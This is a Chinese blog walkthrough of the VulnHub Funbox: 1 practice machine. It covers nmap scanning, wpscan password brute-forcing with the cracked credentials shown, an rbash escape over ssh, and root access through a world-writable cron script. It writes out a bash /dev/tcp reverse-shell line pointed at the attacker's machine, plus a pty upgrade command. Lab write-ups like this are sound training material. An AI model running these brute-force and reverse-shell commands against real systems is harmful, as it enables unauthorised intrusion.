vulnhub Funbox: 1

最新推荐文章于 2024-03-11 11:16:45 发布
最新推荐文章于 2024-03-11 11:16:45 发布
阅读量940 收藏 3
点赞数
分类专栏: vulnhub 文章标签: linux 安全 rbash 定时任务 wordpress
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/elephantxiang/article/details/125698930
版权

渗透思路:

nmap扫描----wpscan爆破网站用户名和密码----joe用户ssh登录并绕过rbash----文件权限777定时任务提权(多个用户定时任务执行同一个文件)

环境信息:

靶机:192.168.101.82

攻击机:192.168.101.34

具体步骤:

1、nmap扫描

sudo nmap -sV -sC -p- 192.168.101.82

扫描到tcp端口21、22、80、33060

2、修改/etc/hosts

浏览器访问靶机80端口http://192.168.101.82,会自动跳转到http://funbox.fritz.box/,但由于没有在hosts文件中配置ip和域名的映射关系,因此无法正常访问网站。

修改攻击机的/etc/hosts文件

sudo vim /etc/hosts

加上

192.168.101.82 funbox.fritz.box

再在浏览器中访问http://funbox.fritz.box/,即可正常访问,并且可以看出站点是基于wordpress的(如果从外观不能确定的话,拉到最下面可以看到Proudly powered by WordPress。或者也可以用dirb或gobuster等扫描网站目录)

3、wpscan爆破网站用户名和密码

首先用wpscan枚举网站用户名

wpscan --url http://funbox.fritz.box/ -e

发现两个用户名:admin和joe

再用wpscan爆破网站用户的密码,其中user.txt中包含admin和joe两个用户名(各一行),密码字典用的是kali自带的rockyou.txt

wpscan --url http://funbox.fritz.box/ -U user.txt -P rockyou.txt

两个用户的密码都爆破出来了

| Username: joe, Password: 12345

| Username: admin, Password: iubire

4、joe用户ssh登录并绕过rbash

浏览器访问wordpress的登录页面:http://funbox.fritz.box/wp-login.php

本来打算能用admin登录就用,哪知道admin登录还开启了邮件验证

只能退而求其次改用joe登录,登录后来到http://funbox.fritz.box/wp-admin/

很可惜,没发现可以getshell的漏洞

尝试用步骤3中爆破出的用户名和密码进行ssh登录,admin无法登录,joe可以登录成功

ssh joe@192.168.101.82

密码12345

想执行find命令的时候发现这是个rbash

退出ssh登录,重新ssh登录,并在登陆时加上-t参数绕过rbash

ssh joe@192.168.101.82 -t "bash --noprofile"

这样登录后就可以绕过rbash限制

5、文件权限777定时任务提权

进入/home文件夹,发现除了joe的家目录,还有funny的家目录。

进入funny家目录,发现文件.reminder.sh,查看内容发现提示管理员会持续测试脚本.backup.sh,也就是说这可能是个定时任务,而这个.backup.sh又这么巧文件权限是777,也就是joe也有修改它的权限

在攻击机上nc监听8888端口,并将反弹shell语句写入.backup.sh

echo "bash -i &>/dev/tcp/192.168.101.34/8888 <&1" >> .backup.sh

稍等片刻,在攻击机上nc监听的端口上即可得到funny的反弹shell

输入如下命令得到交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

之后尝试寻找了很多提权方法都没找到,最后看了这篇writeup才发现原来root和funny都定时执行.backup.sh

VulnHub Funbox 1 Walkthrough - Rbash Escape

细想来,.reminder.sh中确实提示了admin会长期测试.backup.sh。

于是我同时在两个终端中用nc监听8888端口,并且一旦获得funny用户的反弹shell就终端连接并重新开始监听8888端口,最后终于在漫长的几分钟之后,得到了root的反弹shell

题外话(root和funny的定时任务)

root和funny的定时任务都在/var/spool/cron/crontabs文件夹下

/var/spool/cron/crontabs/funny内容如下,每2分钟执行一次/home/funny/.backup.sh

/var/spool/cron/crontabs/root内容如下,每5分钟执行一次/home/funny/.backup.sh

仙女象
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub靶机实战--FunBox:1
m0_64312309的博客
09-21 458
Vulnhub介绍: Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场,同时它还提供了 Docker 镜像,可以使用 Docker 直接启动靶场,大大简化了渗透测试人员在搭建各种漏洞靶场时的步骤
Vulnhub靶场 DC系列 DC-2靶场
sdfsergfr的博客
12-12 639
Vulnhub靶场 DC系列 DC-2靶场
Vulnhub靶机Funbox:1 writeup
xingjinhao123的博客
01-11 1412
下载地址:https://www.vulnhub.com/entry/funbox-1,518/ 信息搜集 获取IP地址 扫描端口 这里看到一共开放了四个端口21:ftp,22:ssh,88:http,3306:mysql 21端口 登录ftp的时候需要用户名密码,先放着 80端口 访问80端口发现会跳转到funbox.fritz.box 修改hosts为: 再次访问80端口 这里看到使用了wordpress管理系统 可以使用wpscan尝试枚举下用户和插件: wpscan --url ht
wpscan专门针对wordpress安全扫描工具
最新发布
没刮胡子的程序员专栏
03-11 565
WPScan是一款专门针对WordPress的漏洞扫描工具,它使用Ruby编程语言编写。WPScan能够扫描WordPress网站中的多种安全漏洞,包括WordPress本身的漏洞、插件漏洞和主题漏洞。此外,WPScan还能扫描类似robots.txt这样的敏感文件,并检测当前已启用的插件和其他功能。WPScan的数据库中包含大量的插件漏洞和主题漏洞信息,可以帮助用户快速发现潜在的安全风险。
vulnhub FUNBOX: 1记录
qq_45826388的博客
09-23 332
Description Boot2Root ! This is a reallife szenario, but easy going. You have to enumerate and understand the szenario to get the root-flag in round about 20min. This VM is created/tested with Virtualbox. Maybe it works with vmware. If you need hints, ca
vulnhub Loly: 1
箭雨镜屋
09-12 1985
渗透思路: nmap扫描端口 ---- gobuster扫描网站目录 ---- wpscan爆破wordpress用户名和密码 ---- 利用wordpress AdRotate文件上传功能getshell ---- 利用内核漏洞提权(eBPF_verifier)
funbox:测试和工具程序
02-11
滑稽
docker-funbox:具有有趣的终端命令和ASCII艺术的Docker容器
05-04
Docker Funbox 带有有趣怪异终端命令和ASCII艺术的容器。 特色 按字母顺序: 洛尔卡特 喵喵猫 管道 RIG-随机身份生成器 sl (不要与ls混淆) 洗手间 VLC S 基本用法 $ docker run --rm -it wernight/funbox _ ...
funbox_reactapp:测试
05-11
该项目是通过引导的。 您将在下面找到一些有关如何执行常见任务的信息。 您可以在找到本指南的最新版本。目录自动格式化代码更改页面<title>... 使用AJAX请求获取数据与API后端集成节点Ruby on Rails 在开发中...
funxbox-test:Funbox的测试任务
05-08
Funbox的测试任务 要启动它: npm安装 凉亭安装 吞咽 喝一口 gulp测试(用于测试) 通过在文本框中输入名称并按Enter,可以添加新的航点。 此后: 输入的路径点显示在已添加点列表的末尾; 标记会出现在地图...
中兴funbox固件b18版本
07-12
中兴funbox固件,b18,android 4.4
ssh: connect to host 192.168.101.34 port 22: Connection timed out
热门推荐
longcheng217的博客
04-01 1万+
背景: 使用 Cygwin64 登录虚拟机时发现无法远程登录虚拟机中Ubuntu系统(之前可以): $ ssh lc@192.168.101.34 ssh: connect to host 192.168.101.34 port 22: Connection timed out 解决步骤: 1. 查看是否开启了ssh服务 发现 ssh服务已经开启 2. 在PC端ping 虚拟机 C:\Use...
kali中wpscan工具使用
y995zq的博客
01-10 2216
wpscan
vulnhub Funbox: Under Construction
箭雨镜屋
05-28 520
渗透思路:nmap扫描端口----dirb扫描网站目录----利用osCommerce v2.3.4.1的rce漏洞getshell----pspy64s发现定时任务----信息泄漏获得root密码----su输入密码提权
wpscan使用教程
Bird&Bird
07-07 6943
目录概述主要参数工具使用扫描wordpress站点插件扫描扫描插件漏洞扫描主题扫描主题漏洞枚举wordpress用户名暴露破解密码结合MSF获取shell 概述 WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括主题漏洞、插件漏洞和WordPress本身的漏洞。最新版本WPScan的数据库中包含超过18000种插件漏洞和2600种主题漏洞,并且支持最新版本的WordPress。值得注意的是,它不仅能够扫描类似robots
064 渗透测试实战,靶机 DC-2
鸡蛋炒鸡蛋
04-23 860
文章目录一:环境准备二:flag1三:flag2四:flag3五:flag4六:flag5 一:环境准备 下载:点我 下载之后完成安装,过程详情请参考,063 渗透测试实战,靶机 DC-1 打开DC-2 打开Kali nmap 扫描局域网主机 nmap -sP 192.168.100.0/24 -oN nmap.sP 确定主机之后,对主机进行端口扫描: nmap -A 192.168.100.8 -p 1-65535 -oN nmap.A 发现开放了80和7744端口号。 开放了80端口号,所以这时候
wordpress 入侵 wpscan
dzp443366的专栏
09-15 2691
WPScan是一款针对wwordpress安全扫描软件;WPScan可以扫描出wordpress的版本,主题,插件,后台用户以及爆破后台用户密码等。 可以自己本机搭建一个环境玩玩:点此查看 这里重复一下简单使用过程: wpscan --url www.xxx.com                 #扫描基本信息   wpscan --url www.xxx.com -
wpscan渗透wordpress靶机——dc6
网络设备配置-华为
09-22 1128
wordpress: wpscan: 实验环境:kali linux和靶机环境 dc6靶机下载地址:https://download.vulnhub.com/dc/DC-6.zip 下载后,直接在vm打开即可。 注意要使kali和靶机同处一个网段之中,我这里都在VM中搭建NAT模式。 信息收集 靶机打后是这样的: 这个时候出于需求目的,我们需要探测目标主机的ip、操作系统和版本以及其他服务的版本号。kali中集成了很多信息收集的工具,我这里仅用最常使用的 NMAP。 一、勘测目标主机ip地址和开放端口及服
小白日记1:kali环境Wpscan渗透Wordpress
ZiXuanFY的博客
09-05 1万+
一、什么是Wpscan?什么是Wordpres?     1.Wpscan      WPScan是一款针对wwordpress安全扫描软件;可以扫描出wordpress的版本,主题,插件,后台用户以及爆破后台用户密码等。     2.Wordpress      WordPress是一种使用PHP语言和MySQL数据库开发的博客平台,用户可以在支持PHP和MySQL数据
FUNBOX: UNDER CONSTRUCTION!
08-16
- *1* *3* [vulnhub刷题记录(FUNBOX: UNDER CONSTRUCTION!)](https://blog.csdn.net/admin_gt/article/details/126722192)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值